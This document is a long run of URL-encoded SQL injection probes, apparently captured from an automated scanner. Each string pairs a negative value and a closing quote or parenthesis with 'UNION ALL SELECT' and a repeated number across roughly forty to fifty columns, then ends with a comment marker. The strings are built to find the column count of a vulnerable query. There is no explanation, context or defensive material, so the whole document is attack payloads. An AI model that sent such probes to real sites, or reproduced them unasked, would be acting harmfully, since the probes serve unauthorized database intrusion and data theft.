-9290%29%20UNION%20ALL%20SELECT%205199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%2C5199%23 -9033%29%20UNION%20ALL%20SELECT%205375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%2C5375%23 -9484%29%20UNION%20ALL%20SELECT%207693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%2C7693%23 -7350%29%20UNION%20ALL%20SELECT%204112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%2C4112%23 -7691%29%20UNION%20ALL%20SELECT%206149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%2C6149%23 -5475%27%29%20UNION%20ALL%20SELECT%209660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%2C9660%23 -5636%27%29%20UNION%20ALL%20SELECT%208017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%23 -2841%27%29%20UNION%20ALL%20SELECT%208204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%2C8204%23 -5249%27%29%20UNION%20ALL%20SELECT%207108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%2C7108%23 -4614%27%29%20UNION%20ALL%20SELECT%209384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%2C9384%23 -5185%27%29%20UNION%20ALL%20SELECT%201232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%2C1232%23 -7157%27%29%20UNION%20ALL%20SELECT%206697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%2C6697%23 -1512%27%29%20UNION%20ALL%20SELECT%207084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%23 -1389%27%29%20UNION%20ALL%20SELECT%209498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%2C9498%23 -7768%27%29%20UNION%20ALL%20SELECT%206636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%2C6636%23 -7435%27%20UNION%20ALL%20SELECT%204849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%23 -6769%27%20UNION%20ALL%20SELECT%201840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%2C1840%23 -1790%27%20UNION%20ALL%20SELECT%201210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%2C1210%23 -1574%27%20UNION%20ALL%20SELECT%202413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%23 -4361%27%20UNION%20ALL%20SELECT%206262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%2C6262%23 -9377%27%20UNION%20ALL%20SELECT%209764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%2C9764%23 -8842%27%20UNION%20ALL%20SELECT%205744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%23 -9313%27%20UNION%20ALL%20SELECT%209331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%23 -3344%27%20UNION%20ALL%20SELECT%206238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%2C6238%23 -6140%27%20UNION%20ALL%20SELECT%209998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%23 -1978%22%20UNION%20ALL%20SELECT%203921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%2C3921%23 -9316%22%20UNION%20ALL%20SELECT%209496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%2C9496%23 -8338%22%20UNION%20ALL%20SELECT%208077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%2C8077%23 -8834%22%20UNION%20ALL%20SELECT%202195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%2C2195%23 -7567%22%20UNION%20ALL%20SELECT%208762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%2C8762%23 -7247%22%20UNION%20ALL%20SELECT%208052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%2C8052%23 -9118%22%20UNION%20ALL%20SELECT%205575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%2C5575%23 -6117%22%20UNION%20ALL%20SELECT%205267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%2C5267%23 -5846%22%20UNION%20ALL%20SELECT%203369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%23 -4819%22%20UNION%20ALL%20SELECT%201597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%2C1597%23 -8178%29%20UNION%20ALL%20SELECT%207782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%2C7782%23 -3768%29%20UNION%20ALL%20SELECT%209602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%23 -4806%29%20UNION%20ALL%20SELECT%202051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%23 -7221%29%20UNION%20ALL%20SELECT%206740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%23 -7009%29%20UNION%20ALL%20SELECT%202685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%23 -3209%29%20UNION%20ALL%20SELECT%201465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%2C1465%23 -6857%29%20UNION%20ALL%20SELECT%203548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%2C3548%23 -5158%29%20UNION%20ALL%20SELECT%204800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%2C4800%23 -3599%29%20UNION%20ALL%20SELECT%205387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%2C5387%23 -8663%29%20UNION%20ALL%20SELECT%201228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%2C1228%23 -6777%29%29%20UNION%20ALL%20SELECT%209996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%2C9996%23 -2617%29%29%20UNION%20ALL%20SELECT%202354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%2C2354%23 -9484%29%29%20UNION%20ALL%20SELECT%204229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%23 -4383%29%29%20UNION%20ALL%20SELECT%205504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%2C5504%23 -2267%29%29%20UNION%20ALL%20SELECT%206502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%2C6502%23 -2086%29%29%20UNION%20ALL%20SELECT%206614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%2C6614%23 -2052%29%29%20UNION%20ALL%20SELECT%201127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%2C1127%23 -8918%29%29%20UNION%20ALL%20SELECT%202363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%2C2363%23 -8668%29%29%20UNION%20ALL%20SELECT%202304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%23 -9096%29%29%20UNION%20ALL%20SELECT%201408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%2C1408%23 -3061%29%29%29%20UNION%20ALL%20SELECT%204189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%2C4189%23 -4622%29%29%29%20UNION%20ALL%20SELECT%206696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%2C6696%23 -3061%29%29%29%20UNION%20ALL%20SELECT%201045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%23 -7218%29%29%29%20UNION%20ALL%20SELECT%205287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%2C5287%23 